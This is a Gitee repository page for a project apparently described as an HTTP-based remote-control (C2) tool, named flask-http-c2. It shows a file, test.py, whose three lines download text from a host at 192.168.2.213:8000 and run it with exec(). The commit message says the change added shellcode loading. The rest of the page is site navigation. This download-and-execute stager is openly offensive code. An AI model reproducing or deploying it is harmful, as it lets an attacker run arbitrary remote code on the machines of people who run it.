1 Star 7 Fork 4

cutecuteyu/基于http协议的远控

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
克隆/下载
test.py 84 Bytes
一键复制 编辑 原始数据 按行查看 历史
cutecuteyu 提交于 2022-09-15 00:45 . 添加了shellcode加载功能
import requests
re = requests.get("http://192.168.2.213:8000/1.txt")
exec(re.text)
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
Python
1
https://gitee.com/cutecuteyu/flask-http-c2.git
git@gitee.com:cutecuteyu/flask-http-c2.git
cutecuteyu
flask-http-c2
基于http协议的远控
master

搜索帮助